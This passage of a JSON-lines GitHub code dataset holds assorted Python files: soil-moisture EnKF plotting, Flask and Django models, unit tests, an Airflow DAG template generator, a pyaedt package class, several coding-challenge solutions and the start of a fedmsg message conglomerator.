= measurementListTCal[i][j*nodesInZ:((j+1)*nodesInZ)]\n# plotT1Day.append(plotT)\n# plotTAll.extend(plotT1Day)\n\n\n##Plot the graph\n#plt.plot(xTrue, depthList, linestyle = '--', label='Process')\n#plt.plot(x, depthList, label='Initial guess')\n#plt.xlabel('Soil pressure head, h (m)')\n#plt.ylabel('Soil depth, z (m)')\n#plt.title('Initial pressure head profile')\n#plt.legend()\n#plt.show()\n\n\n#for n in range(numberOfGrids): \n# print('Grid number: ', n)\n# for i in range(timeSpan):\n# #f, axarr = plt.subplots(timeSpan, 2, sharey = 'depthList')\n# plt.plot(measurementListTPlot[i*numberOfGrids+n], depthList, linestyle = '--', label='Process '+str(i+1)+' day')\n# plt.plot(measurementListF[i*numberOfGrids+n], depthList, label='Openloop prediction '+str(i+1)+' day')\n# plt.plot(ThetaListMeanUAllForPlot[i*numberOfGrids+n], depthList, label='EnKF update '+str(i+1)+' day')\n# #plt.scatter(measurementSensorList[i], depthList[depthOfSensor], label='Sensor '+str(i+1)+' day')\n# plt.xlabel('Soil pressure head, h (m)')\n# plt.ylabel('Soil depth, z (m)')\n# plt.title('Predicted soil pressure head profile')\n# plt.legend()\n# plt.show()\n#\n# try:\n# input(\"Press enter to continue\")\n# except SyntaxError:\n# pass\n \nfor n in range(5):\n print('Grid number: ', n+1)\n if n == 0:\n plt.plot(xTrue1, depthList, linestyle = '--', label='Process')\n plt.plot(xF, depthList, label='Initial guess')\n plt.xlabel('Soil pressure head, h (m)')\n plt.ylabel('Soil depth, z (m)')\n plt.title('Initial pressure head profile')\n plt.legend()\n plt.show()\n if n == 4:\n plt.plot(xTrue5, depthList, linestyle = '--', label='Process')\n plt.plot(xF, depthList, label='Initial guess')\n 
plt.xlabel('Soil pressure head, h (m)')\n plt.ylabel('Soil depth, z (m)')\n plt.title('Initial pressure head profile')\n plt.legend()\n plt.show() \n for i in range(timeSpan):\n #f, axarr = plt.subplots(timeSpan, 2, sharey = 'depthList')\n plt.plot(measurementListTPlot[i*numberOfGrids+n], depthList, linestyle = '--', label='Process '+str(i+1)+' day')\n plt.plot(measurementListF[i*numberOfGrids+n], depthList, label='Openloop prediction '+str(i+1)+' day')\n plt.plot(ThetaListMeanUAllForPlot[i*numberOfGrids+n], depthList, label='EnKF update '+str(i+1)+' day')\n #plt.scatter(measurementSensorList[i], depthList[depthOfSensor], label='Sensor '+str(i+1)+' day')\n plt.xlabel('Soil pressure head, h (m)')\n plt.ylabel('Soil depth, z (m)')\n plt.title('Predicted soil pressure head profile')\n plt.legend()\n plt.show()\n\n# try:\n# input(\"Press enter to continue\")\n# except SyntaxError:\n# pass\n\nprint((time.clock() - start_time)/60, 'minutes') \n \n \n\n \n\n\n","repo_name":"sbo5/irrigation","sub_path":"Ubuntu_codes/state_estimation_enkf_box_sim/model_enkf.py","file_name":"model_enkf.py","file_ext":"py","file_size_in_byte":13776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33928140618","text":"# Flask server\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route(\"/getData\")\ndef get_data():\n with open(\"data.txt\", \"r\") as f:\n return jsonify({\n \"masks\": f.readline(),\n \"nonmasks\": f.readline(),\n })\n\n\nif __name__ == \"__main__\":\n app.run(debug=False, port=5000, host='0.0.0.0')\n","repo_name":"Keraisyn/covid-control","sub_path":"back-end/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"6092400001","text":"class ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def isPalindrome(self, head):\n fast = slow = head\n stack = []\n\n while fast and fast.next:\n stack.append(slow.val)\n slow = slow.next\n fast = fast.next\n\n if fast:\n slow = slow.next\n \n while slow:\n if stack.pop() != slow.val:\n return False\n slow = slow.next\n return True","repo_name":"liugongfeng/leetCode","sub_path":"LeetCode 234.py","file_name":"LeetCode 234.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43743630448","text":"# -*- coding: utf-8 -*-\n\nimport unittest\nimport html\nfrom downloader.youtube_downloader import RessourceYT, Youtube_Dl\nfrom downloader import global_proxy\nfrom unittest import mock\n\n\n# ------------------------------------------------------------------------------------------------------\n# Implémentation des Tests unitaires\n# Auteur : SDI\n# Date : 15/02/2020\n# Objectif : educationnal purpose only. 
Merci de respecter les copyrights.\n# ------------------------------------------------------------------------------------------------------\n\n\nclass TestYoutubeDownloader(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.src= TestYoutubeDownloader.read_file_to_html(\"data/youtube_download_test_data.html\")\n cls.YoutubeDl = Youtube_Dl(\"https://www.youtube.com/watch?v=HGp5UnNiLOA&list=PL4OLSC172x8p8Dy-A88_k_zhKRvpPwRgq\")\n\n # Lecture des fichier html en utf8\n @staticmethod\n def read_file_to_html(filename):\n with open(filename) as f:\n h = f.read()\n return html.unescape(h)\n\n # --------------------------------------------------------------------------\n # Tests Classe RessourceFile\n # --------------------------------------------------------------------------\n def test_ressourcesYT(self):\n r1 = RessourceYT(link='https://www.youtube.com/watch?v=1', downloaded=True)\n r2 = RessourceYT(link='https://www.youtube.com/watch?v=1', downloaded=False)\n r3 = RessourceYT(link='https://www.youtube.com/watch?v=3')\n self.assertEqual(r1,r2)\n self.assertNotEqual(r2,r3)\n self.assertEqual(None, r1.titre)\n self.assertEqual(None, r2.length)\n\n # --------------------------------------------------------------------------\n # Tests Classe Downloader:\n # --------------------------------------------------------------------------\n\n @mock.patch('downloader.youtube_downloader.Youtube_Dl._get_srcpage')\n def test_get_youtube_vids_on_url(self, mockrequest):\n mockrequest.return_value = self.src\n rs = self.YoutubeDl.get_youtube_vids_on_url()\n self.assertIsInstance(rs, list)\n self.assertIsInstance(rs[0],RessourceYT)\n self.assertEqual(39, len(rs))\n self.assertIn(RessourceYT(link='https://www.youtube.com/watch?v=ua2WkSvmylw'), rs)\n\n\n @mock.patch('downloader.youtube_downloader.Youtube_Dl._get_srcpage')\n def test_get_youtube_vids_on_url_without_playlist(self, mockrequest):\n mockrequest.return_value = self.src\n yt = Youtube_Dl(\"https://www.youtube.com/watch?v=HGp5UnNiLOA\")\n rs = yt.get_youtube_vids_on_url()\n self.assertIsInstance(rs, list)\n self.assertIsInstance(rs[0], RessourceYT)\n self.assertEqual(1, len(rs))\n self.assertEqual(\"https://www.youtube.com/watch?v=HGp5UnNiLOA\", rs[0].link)\n\n\n def test_get_paramplaylist_from_url(self):\n self.assertEqual(\"PL4OLSC172x8p8Dy-A88_k_zhKRvpPwRgq\", self.YoutubeDl._get_playlist_param_from_url())\n self.assertEqual(\"\", Youtube_Dl(\"https://www.youtube.com/watch?v=HGp5UnNiLOA\")._get_playlist_param_from_url())\n with self.assertRaises(Exception):\n self.assertEqual(\"\", Youtube_Dl(\"https://www.youtube.com\")._get_playlist_param._from_url())\n self.assertEqual(\"\", Youtube_Dl(\"\")._get_playlist_param_from_url())\n\n","repo_name":"StephaneDci/downloader","sub_path":"test/test_youtube_downloader.py","file_name":"test_youtube_downloader.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20894810802","text":"from src import db\nfrom uuid import uuid4\n\nclass Reservation(db.Model):\n __tablename__ = \"reservation\"\n \n id = db.Column(db.Integer, primary_key=True)\n uuid = db.Column(db.String(255), unique=True)\n first_name = db.Column(db.String(110), nullable=False)\n second_name = db.Column(db.String(110), nullable=False)\n email = db.Column(db.String(25), nullable=False, unique=True)\n event_id = db.Column(db.Integer, db.ForeignKey(\"events.id\"), nullable=False)\n\n def __init__(self, first_name, second_name, email, 
event_id):\n self.uuid = str(uuid4())\n self.first_name = first_name\n self.second_name = second_name\n self.email = email\n self.event_id = event_id\n\nclass Event(db.Model):\n __tablename__ = \"events\"\n\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(120), nullable=False, unique=True)\n description = db.Column(db.Text)\n reservation = db.relationship(\"Reservation\", backref='events', lazy=True)\n","repo_name":"Chortzaberay/mg-eventsApi","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35988199105","text":"import itertools\n\nimport numpy as np\nimport pandas as pd\n\nfrom gama.data import format_x_y\nfrom gama.utilities.preprocessing import (\n find_categorical_columns,\n basic_encoding,\n basic_pipeline_extension,\n)\n\n\ndef test_format_x_y():\n \"\"\" X and y data get converted to (pd.DataFrame, pd.DataFrame). \"\"\"\n\n def well_formatted_x_y(x, y, y_type):\n assert isinstance(x, pd.DataFrame)\n assert isinstance(y, y_type)\n assert len(x) == len(y)\n\n from sklearn.datasets import load_digits\n\n X_np, y_np = load_digits(return_X_y=True)\n X_df, y_df = pd.DataFrame(X_np), pd.DataFrame(y_np)\n y_series = pd.Series(y_np)\n y_2d = y_np.reshape(-1, 1)\n\n for X, y in itertools.product([X_np, X_df], [y_np, y_series, y_df, y_2d]):\n well_formatted_x_y(*format_x_y(X, y), y_type=pd.Series)\n well_formatted_x_y(*format_x_y(X, y, y_type=pd.DataFrame), y_type=pd.DataFrame)\n\n\ndef test_format_x_y_missing_targets():\n \"\"\" Samples with missing labels should be removed from training data. \"\"\"\n\n def well_formatted_x_y(x, y, y_type):\n assert isinstance(x, pd.DataFrame)\n assert isinstance(y, y_type)\n assert len(x) == len(y)\n\n from sklearn.datasets import load_digits\n\n x, y = load_digits(return_X_y=True)\n y = y.astype(float)\n y[::2] = np.nan\n x_, y_ = format_x_y(x, y)\n\n assert (1797,) == y.shape\n assert (898,) == y_.shape\n assert np.array_equal(y[1::2], y_)\n assert np.array_equal(x[1::2, :], x_)\n well_formatted_x_y(x_, y_, y_type=pd.Series)\n\n\ndef test_find_categorical_columns():\n twelve = pd.Series(list(range(1, 13)), dtype=\"category\", name=\"twelve\")\n six = pd.Series([1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6], dtype=\"category\", name=\"six\")\n two = pd.Series([1, 2] * 6, dtype=\"category\", name=\"two\")\n two_nan = pd.Series([1, 2, np.nan] * 4, dtype=\"category\", name=\"two_nan\")\n df = pd.DataFrame({s.name: s for s in [two, two_nan, six, twelve]})\n assert [\"two\", \"two_nan\"] == list(find_categorical_columns(df, max_f=2))\n assert [\"two\"] == list(find_categorical_columns(df, max_f=2, ignore_nan=False))\n assert [\"six\"] == list(find_categorical_columns(df, min_f=5, max_f=10))\n assert [\"twelve\"] == list(find_categorical_columns(df, min_f=10))\n","repo_name":"emailhy/gama","sub_path":"tests/unit/test_preprocessing.py","file_name":"test_preprocessing.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"6294136452","text":"import math\n\nfrom pyaedt.edb_core.ipc2581.content.entry_line import EntryLine\nfrom pyaedt.edb_core.ipc2581.ecad.cad_data.assembly_drawing import AssemblyDrawing\nfrom pyaedt.edb_core.ipc2581.ecad.cad_data.outline import Outline\nfrom pyaedt.edb_core.ipc2581.ecad.cad_data.pin import Pin\nfrom pyaedt.edb_core.ipc2581.ecad.cad_data.polygon import PolyStep\nfrom 
pyaedt.generic.general_methods import ET\nfrom pyaedt.generic.general_methods import pyaedt_function_handler\n\n\nclass Package(object):\n \"\"\"Class describing an IPC2581 package definition.\"\"\"\n\n def __init__(self, ipc):\n self._ipc = ipc\n self.name = \"\"\n self.type = \"OTHER\"\n self.pin_one = \"1\"\n self.pin_orientation = \"OTHER\"\n self.height = 0.1\n self.assembly_drawing = AssemblyDrawing(self._ipc)\n self.outline = Outline(self._ipc)\n self._pins = []\n self.pickup_point = [0.0, 0.0]\n\n @property\n def pins(self):\n return self._pins\n\n @pins.setter\n def pins(self, value): # pragma no cover\n if isinstance(value, list):\n if len([pin for pin in value if isinstance(pin, Pin)]) == len(value):\n self._pins = value\n\n @pyaedt_function_handler()\n def add_pin(self, number=0, x=0.0, y=0.0, rotation=0.0, primitive_ref=\"\"): # pragma no cover\n added_pin = Pin()\n added_pin.x = x\n added_pin.y = y\n added_pin.rotation = rotation * 180 / math.pi\n added_pin.number = number\n added_pin.primitive_def = primitive_ref\n self.pins.append(added_pin)\n\n @pyaedt_function_handler()\n def add_component_outline(self, component): # pragma no cover\n if component:\n _bbox = component.bounding_box\n _rot = component.rotation\n average_x = (_bbox[0] + _bbox[2]) / 2\n average_y = (_bbox[1] + _bbox[3]) / 2\n bb1x = _bbox[0] - average_x\n bb1y = _bbox[1] - average_y\n bb2x = _bbox[2] - average_x\n bb2y = _bbox[3] - average_y\n\n bb1x_rot = bb1x\n bb2x_rot = bb2x\n bb1y_rot = bb1y\n bb2y_rot = bb2y\n if _rot >= math.pi / 4 and _rot <= 0.75 * math.pi:\n bb = bb1x_rot\n bb1x_rot = bb1y_rot\n bb1y_rot = bb\n bb = bb2x_rot\n bb2x_rot = bb2y_rot\n bb2y_rot = bb\n poly_step1 = PolyStep()\n poly_step2 = PolyStep()\n poly_step3 = PolyStep()\n poly_step4 = PolyStep()\n poly_step5 = PolyStep()\n poly_step1.x = str(self._ipc.from_meter_to_units(bb1x_rot, self._ipc.units))\n poly_step1.y = str(self._ipc.from_meter_to_units(bb1y_rot, self._ipc.units))\n poly_step2.x = str(self._ipc.from_meter_to_units(bb2x_rot, self._ipc.units))\n poly_step2.y = str(self._ipc.from_meter_to_units(bb1y_rot, self._ipc.units))\n poly_step3.x = str(self._ipc.from_meter_to_units(bb2x_rot, self._ipc.units))\n poly_step3.y = str(self._ipc.from_meter_to_units(bb2y_rot, self._ipc.units))\n poly_step4.x = str(self._ipc.from_meter_to_units(bb1x_rot, self._ipc.units))\n poly_step4.y = str(self._ipc.from_meter_to_units(bb2y_rot, self._ipc.units))\n poly_step5.x = str(self._ipc.from_meter_to_units(bb1x_rot, self._ipc.units))\n poly_step5.y = str(self._ipc.from_meter_to_units(bb1y_rot, self._ipc.units))\n self.outline.polygon.poly_steps = [poly_step1, poly_step2, poly_step3, poly_step4, poly_step5]\n if not \"ROUND_0\" in self._ipc.content.dict_line.dict_lines:\n entry_line = EntryLine()\n entry_line.line_width = 0.0\n self._ipc.content.dict_line.dict_lines[\"ROUND_0\"] = entry_line\n self.outline.line_ref = \"ROUND_0\"\n self.assembly_drawing.polygon.poly_steps = [poly_step1, poly_step2, poly_step3, poly_step4, poly_step5]\n self.assembly_drawing.line_ref = \"ROUND_0\"\n\n @pyaedt_function_handler()\n def write_xml(self, step): # pragma no cover\n package = ET.SubElement(step, \"Package\")\n package.set(\"name\", self.name)\n package.set(\"type\", self.type)\n package.set(\"pinOne\", self.pin_one)\n package.set(\"pinOneOrientation\", self.pin_orientation)\n package.set(\"height\", str(self.height))\n self.outline.write_xml(package)\n self.assembly_drawing.write_xml(package)\n for pin in self.pins:\n 
pin.write_xml(package)\n","repo_name":"ansys/pyaedt","sub_path":"pyaedt/edb_core/ipc2581/ecad/cad_data/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"7"} +{"seq_id":"37196044077","text":"import shutil\n\nfrom datetime import datetime\n\n\ndef create_dag(target_path, template_path, dag_id, hyperparameters):\n \"\"\"\n Given the hyperparameters of a model, this function creates a DAG by using a defined template. The dag id\n and the hyperparameters of the model are arguments that replace spaces in the base template to create the final\n python file (DAG).\n\n Parameters\n ----------\n target_path: indicates where the DAG is saved (DAG folder). (str)\n dag_id: corresponds to the model name encoded by its hyperparameters. (str)\n hyperparameters: list that contains the values of each hyperparameter. (lst)\n\n Returns\n -------\n Custom python file according to the model and its hyperparameters, created in the DAG folder. (.py)\n \"\"\"\n # Initially, we go to the first day of the actual month\n input_dt = datetime.now().date()\n first = input_dt.replace(day=1)\n start_date = 'datetime(' + str(first).replace('-0', ', ') + ')'\n\n # Initialize all possible hyperparameters with 'np.nan' string\n all_hyper = []\n for i in range(0, len(hyperparameters)):\n all_hyper.append('np.nan')\n\n # Get the type of model selected by the user\n model_type = dag_id.split('_')[0]\n\n # If it is a linear regressor model, get its hyperparameters\n if model_type == 'linear':\n all_hyper[0] = str(hyperparameters[0])\n all_hyper[1] = str(int(hyperparameters[1]))\n\n # If it is a decision tree model, get its hyperparameters\n elif model_type == 'decision':\n all_hyper[2] = str(int(hyperparameters[2]))\n # The max_leaf_nodes can be an integer or a string\n if str(hyperparameters[3]) == 'None':\n all_hyper[3] = str(hyperparameters[3])\n else:\n all_hyper[3] = str(int(hyperparameters[3]))\n all_hyper[4] = str(hyperparameters[4])\n\n # If it is a gradient boosting model, get its hyperparameters\n elif model_type == 'gradient':\n all_hyper[5] = str(hyperparameters[5])\n all_hyper[6] = str(int(hyperparameters[6]))\n all_hyper[7] = str(int(hyperparameters[7]))\n all_hyper[8] = str(hyperparameters[8])\n\n # There are no more type models implemented\n else:\n raise Exception('Model name not implemented.')\n\n # Copy the template into the target path\n shutil.copyfile(template_path, target_path)\n\n # Replace the variables in the created file\n replacements = {'dag_id_model': \"'\"+dag_id+\"'\",\n 'fit_intercept_model': all_hyper[0],\n 'n_jobs_model': all_hyper[1],\n 'd_max_depth_model': all_hyper[2],\n 'max_leaf_nodes_model': all_hyper[3],\n 'd_max_features_model': all_hyper[4],\n 'learning_rate_model': all_hyper[5],\n 'n_estimators_model': all_hyper[6],\n 'g_max_depth_model': all_hyper[7],\n 'g_max_features_model': all_hyper[8],\n 'start_date_change': start_date}\n\n lines = []\n with open(target_path) as infile:\n for line in infile:\n for src, target in replacements.items():\n line = line.replace(src, target)\n lines.append(line)\n with open(target_path, 'w') as outfile:\n for line in lines:\n outfile.write(line)\n\n\n","repo_name":"iAguila98/mlops","sub_path":"MLOps_Airflow/shared_volume/scripts/file_creation.py","file_name":"file_creation.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} 
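# Editor's aside: a hedged, minimal sketch (not part of either dataset record
# above) of the copy-then-substitute template idiom that create_dag relies on;
# render_template and both file paths are hypothetical names.
import shutil

def render_template(template_path, target_path, replacements):
    # Copy the template file, then rewrite the copy with every placeholder
    # token replaced by its concrete value.
    shutil.copyfile(template_path, target_path)
    with open(target_path) as infile:
        text = infile.read()
    for placeholder, value in replacements.items():
        text = text.replace(placeholder, value)
    with open(target_path, "w") as outfile:
        outfile.write(text)

# Usage, mirroring create_dag:
# render_template("dag_template.py", "dags/linear_model.py",
#                 {"dag_id_model": "'linear_0.5_1'"})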
+{"seq_id":"41802012714","text":"# 'param' is valid as is a function parameter and\n# will always be bound\ndef foo(param: int) -> str:\n a = 20 # valid, declared in the functions \"global\" scope\n\n # 'b' is declared only inside if:\n # not valid in the outer environment\n if a == param:\n b = \"equal\"\n\n return b # 'b' cannot be used, might not be declared -> error\n\n\n# 'x' is valid because is declared in the global scope\nx = 10\n\n# 'a' is declared inside if branch.\n# 'b' is declared inside else branch.\n# both are not valid in the outer environment: only one of them will be declared on runtime -> error\n\nif x == 10:\n a = x\nelse:\n b = 20\n","repo_name":"Viniciusvcr/bethon","sub_path":"tests/fail/possibly_unbound.py","file_name":"possibly_unbound.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"11027473845","text":"#!python3.5\n\nimport sys\nimport io\nimport math\nimport functools\n\nTEST = \"\"\"3\n3\n4\n5000\"\"\"\n\n# def fib(n):\n# inverseSqrt5 = 0.44721359549995793928183473374626\n# phi = 1.6180339887498948482045868343656\n# return int(math.floor(math.pow(phi, n) * inverseSqrt5 + 0.5))\n\ndef solve(reader):\n test_cases=reader.readline()\n\n for i in range(int(test_cases)):\n N = int(reader.readline().strip())\n\n #v = math.ceil((N - 1 + math.log10(math.sqrt(5))) / math.log10((1+math.sqrt(5))/2))\n\n # the nth fib number is ceil(phi^n / sqrt(5)).\n # Saying a number contains N digits is the same as saying it's\n # greater than 10^(N-1)\n # So we need phi^n/sqrt(5) > 10^(N-1)\n # n * log10(phi) - log10(5)/2 > (N-1) * log10(10)\n # n * log10(phi) > (N-1) * log10(10) + log10(5)/2\n # n > ((N-1) * log10(10) + log10(5) / 2) / log10(phi)\n phi = 1.6180339887498948482045868343656\n v = math.ceil((N-1 * math.log10(10) + math.log10(5) / 2) / math.log10(phi))\n print(v)\n\ndef main():\n # for testing purposes\n if len(sys.argv) == 2 and sys.argv[1] == \"test\":\n solve(io.StringIO(TEST))\n return\n solve(sys.stdin)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kdar/challenges","sub_path":"hackerrank/contests/project_euler/python3/p0025_n-digit_fibonacci_number.py","file_name":"p0025_n-digit_fibonacci_number.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71186364736","text":"from django.db import models\n\n\nSTATUS = (\n ('active', 'Active'),\n ('archived', 'Archived'),\n ('deleted', 'Deleted')\n)\n\nDIMENSION_UNIT = ((\"cm\", \"Centemter\"), (\"m\", \"Meter\"))\n\nWEIGHT_UNIT = ((\"kg\", \"Kilogram\"), (\"g\", \"Gram\"), (\"ml\", \"ML\"), (\"lb\", \"LB\"), (\"l\", \"L\"))\n\n# Create your models here.\nclass TimeStamp(models.Model):\n created_at = models.DateTimeField(auto_now_add=True, null=True, blank=True)\n updated_at = models.DateTimeField(auto_now=True, null=True, blank=True)\n status = models.CharField(max_length=20, default=\"active\", choices=STATUS)\n\n class Meta:\n abstract = True\n\n\n\nclass Brands(TimeStamp):\n # business_id = models.IntegerField(db_column='id', primary_key=True)\n brand_name = models.CharField(db_column='brand_name', max_length=100, null=True, blank=True)\n description = models.TextField(db_column='description', null=True, blank=True)\n slug = models.CharField(db_column='slug', max_length=100, null=True, blank=True)\n # images = models.ImageField()\n\n status = models.CharField(max_length=50, default=\"active\", 
choices=STATUS)\n\n\n class Meta:\n managed = True\n db_table = 'brands'\n\n def __str__(self):\n return str(self.brand_name)\n\n\nclass Departments(TimeStamp):\n title = models.CharField(db_column='title', max_length=100, null=True, blank=True)\n description = models.TextField(db_column='description', null=True, blank=True)\n slug = models.CharField(db_column='slug', max_length=100, null=True, blank=True)\n # images = models.ImageField()\n status = models.CharField(db_column='status', max_length=50, default=\"Active\", choices=STATUS)\n\n\n class Meta:\n managed = True\n db_table = 'departments'\n\n def __str__(self):\n return str(self.title)\n\n\n\nclass Categories(TimeStamp):\n title = models.CharField(db_column='title', max_length=100, null=True, blank=True)\n description = models.TextField(db_column='description', null=True, blank=True)\n slug = models.CharField(db_column='slug', max_length=100, null=True, blank=True)\n # images = models.ImageField()\n department = models.ForeignKey(Departments, db_column='department_id', null=True, blank=True, on_delete=models.SET_NULL)\n\n status = models.CharField(db_column='status', max_length=50, default=\"Active\", choices=STATUS)\n\n class Meta:\n managed = True\n db_table = 'categories'\n\n def __str__(self):\n return str(self.title)\n\n\nclass SubCategories(TimeStamp):\n title = models.CharField(db_column='title', max_length=100, null=True, blank=True)\n description = models.TextField(db_column='description', null=True, blank=True)\n slug = models.CharField(db_column='slug', max_length=100, null=True, blank=True)\n # images = models.ImageField()\n category = models.ForeignKey(Categories, db_column='category_id', null=True, blank=True, on_delete=models.CASCADE)\n\n status = models.CharField(db_column='status', max_length=50, default=\"active\", choices=STATUS)\n\n class Meta:\n managed = True\n db_table = 'sub_categories'\n\n def __str__(self):\n return str(self.title)\n\n\nclass Products(models.Model):\n # business_id = models.IntegerField(db_column='id', primary_key=True)\n sku = models.CharField(db_column='sku', max_length=50, null=True, blank=True, unique=True)\n barcode = models.CharField(db_column='barcode', max_length=100, null=True, blank=True)\n name = models.CharField(db_column='name', max_length=100, null=True, blank=True)\n title = models.CharField(db_column='title', max_length=50, null=True, blank=True)\n description = models.TextField(db_column='description', max_length=500, null=True, blank=True)\n\n\n weight = models.DecimalField(db_column='weight', max_digits=20, decimal_places=5, default=0.0)\n height = models.DecimalField(db_column='height', max_digits=20, decimal_places=5, default=0.0)\n width = models.DecimalField(db_column='width', max_digits=20, decimal_places=5, default=0.0)\n length = models.DecimalField(db_column='length', max_digits=20, decimal_places=5, default=0.0)\n\n # product_type = models.CharField(db_column='type', max_length=200, null=True, blank=True, choices=PRODUCT_TYPE)\n # pack_type = models.CharField(db_column='pack_type', max_length=20, choices=PACK_TYPE)\n # product_status = models.CharField(db_column='product_status', max_length=20, choices=PRODUCT_STATUS, default=\"unapproved\")\n\n # slug = models.CharField(db_column='slug', max_length=100, null=True, blank=True)\n # quantity_in_pack = models.PositiveSmallIntegerField(db_column='quantity_in_pack', null=True, blank=True)\n\n # created_by_user = models.ForeignKey(Users, db_column='created_by_user_id', on_delete=models.SET_NULL, null=True, 
blank=True)\n    brand = models.ForeignKey(Brands, db_column='brand_id', null=True, blank=True, on_delete=models.CASCADE)\n    department = models.ForeignKey(Departments, db_column='department_id', null=True, blank=True, on_delete=models.CASCADE)\n    category = models.ForeignKey(Categories, db_column='category_id', null=True, blank=True, on_delete=models.CASCADE)\n    sub_category = models.ForeignKey(SubCategories, db_column='sub_category_id', null=True, blank=True, on_delete=models.CASCADE)\n\n    # images = models.ImageField()\n    status = models.CharField(db_column='status', max_length=50, default=\"Active\", choices=STATUS)\n\n\n\n    class Meta:\n        managed = True\n        db_table = 'products'\n\n    def __str__(self):\n        return str(self.name)\n","repo_name":"mamun1980/charlirest","sub_path":"src/apps/product/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"8999690445","text":"import sys\n# sys.stdin = open('num.txt', 'r')\ninput = sys.stdin.readline\n\n\nfrom collections import deque\n\nn = int(input())\n\ngraph = [list(map(int, input().strip())) for i in range(n)]\n\n# print(graph)\n# [[0, 1, 1, 0, 1, 0, 0], [0, 1, 1, 0, 1, 0, 1], [1, 1, 1, 0, 1, 0, 1], [0, 0, 0, 0, 1, 1, 1], [0, 1, 0, 0, 0, 0, 0], [0, 1, 1, 1, 1, 1, 0], [0, 1, 1, 1, 0, 0, 0]]\n\nqueue = deque()\ncnt = 0 # number of housing complexes\ncnt_house = 0 # number of houses within a complex\nlist_house = [] # the house counts collected into a list\ndy = [-1, 1, 0, 0] # up, down, left, right\ndx = [0, 0, -1, 1]\n\nfor y in range(n):\n    for x in range(n):\n        if graph[y][x] == 0:\n            continue\n        queue.append((y, x))\n        graph[y][x] = 0\n        cnt += 1\n        cnt_house = 1\n        while queue:\n            r, c = queue.popleft()\n            for d in range(4):\n                ny = r + dy[d]\n                nx = c + dx[d]\n                if 0 <= ny < n and 0 <= nx < n and graph[ny][nx] == 1:\n                    graph[ny][nx] = 0 # mark as visited\n                    cnt_house += 1\n                    queue.append((ny, nx))\n        # cnt += 1\n        list_house.append(cnt_house)\nlist_house.sort()\nprint(cnt)\nif list_house:\n    for i in list_house:\n        print(i)\nelse:\n    print(cnt)\n","repo_name":"Raven712/TIL","sub_path":"7주/35일(DB,DFS,BFS)/bj2667_retry.py","file_name":"bj2667_retry.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"16905428281","text":"#https://www.hackerrank.com/challenges/ginorts/problem\ns = input()\nlower,upper,even,odd = [],[],[],[]\nfor i in s:\n    if i.isalpha():\n        if i.islower(): lower.append(i)\n        if i.isupper(): upper.append(i)\n    if i.isdigit():\n        if int(i)%2 == 0: even.append(i)\n        else:\n            odd.append(i)\nprint(\"\".join((*sorted(lower),*sorted(upper),*sorted(odd),*sorted(even))))\n","repo_name":"Siriapps/hackerrankPython","sub_path":"ginortS.py","file_name":"ginortS.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"12268080791","text":"import fedmsg.meta.base\nfrom fedmsg_meta_fedora_infrastructure.fasshim import avatar_url\n\n\nclass AbstractCoprConglomerator(fedmsg.meta.base.BaseConglomerator):\n    def can_handle(self, msg, **config):\n        return '.copr.' 
in msg['topic']\n\n def merge(self, constituents, subject, **config):\n ms = constituents # shorthand\n\n agents = set([m['msg']['user'] for m in ms if m['msg']['user']])\n coprs = set([m['msg']['copr'] for m in ms])\n count = len([1 for m in ms\n if m['topic'].endswith('copr.build.start')])\n\n if count > 0:\n subtitle = '{agents} kicked off {count} {rebuild_predicate} ' + \\\n 'of the {coprs} {copr_predicate}'\n else:\n # If count is zero, then there are zero start messages in the\n # constituents list, so change tack and render \"finishes\" instead\n # of \"starts\".\n count = len(ms)\n subtitle = 'The {coprs} {copr_predicate} finished ' + \\\n '{count} {rebuild_predicate} by {agents}'\n\n rebuild_predicate = 'rebuilds' if count > 1 else 'rebuild'\n copr_predicate = 'coprs' if len(coprs) > 1 else 'copr'\n\n agents = self.list_to_series(agents)\n coprs = self.list_to_series(coprs)\n\n tmpl = self.produce_template(constituents, subject, **config)\n tmpl['subtitle'] = subtitle.format(\n agents=agents, count=count, coprs=coprs,\n copr_predicate=copr_predicate, rebuild_predicate=rebuild_predicate)\n tmpl['subjective'] = tmpl['subtitle']\n\n default = tmpl['icon']\n\n tmpl['secondary_icon'] = self.get_secondary_icon(constituents, default)\n tmpl['link'] = self.get_link(constituents)\n\n return tmpl\n\n\nclass 